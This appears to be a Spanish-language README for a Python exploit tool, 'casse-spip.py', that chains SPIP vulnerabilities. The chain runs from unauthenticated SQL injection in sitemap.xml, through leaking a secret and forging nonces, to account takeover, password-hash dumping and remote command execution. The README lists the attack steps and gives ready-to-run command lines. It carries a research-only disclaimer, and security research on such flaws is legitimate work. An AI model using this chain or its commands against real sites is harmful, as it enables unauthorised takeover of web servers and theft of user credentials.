
Cadena de explotación en Python para los CVE 2026-72708/72709/72710 de SPIP, encadenando inyección SQL no autenticada hasta la toma de control de cuentas y la ejecución remota de código.
Exploit para CVE-2026-72708, CVE-2026-72709 y CVE-2026-72710 descubiertos por Franck Chevalier (Wayko)
Para un análisis técnico completo, lea el artículo completo en el blog de Lexfo.
Este repositorio se proporciona únicamente con fines de investigación y seguridad defensiva. El autor no asume ninguna responsabilidad por el uso indebido de esta información.
El punto de entrada es una inyección SQL en la página pública sitemap.xml para filtrar alea_ephemere.
Con ese secreto, se pueden falsificar nonces válidos para acciones anónimas.
A partir de ahí, dos acciones conducen a RCE:
action=editer_auteur toma de control de la cuenta, luego RCE desde el área privada.action=editer_objet asignación masiva, para escribir una fila en la cola spip_jobs, luego ejecutarla a través de action=cron.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
Antes de sobrescribir, --ato vuelca el login del objetivo y el hash pass actual
(a través de la SQLi) para que pueda restaurarlo después con --restore-hash:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
El archivo se escribirá en IMG/casse-spip_<token>.html.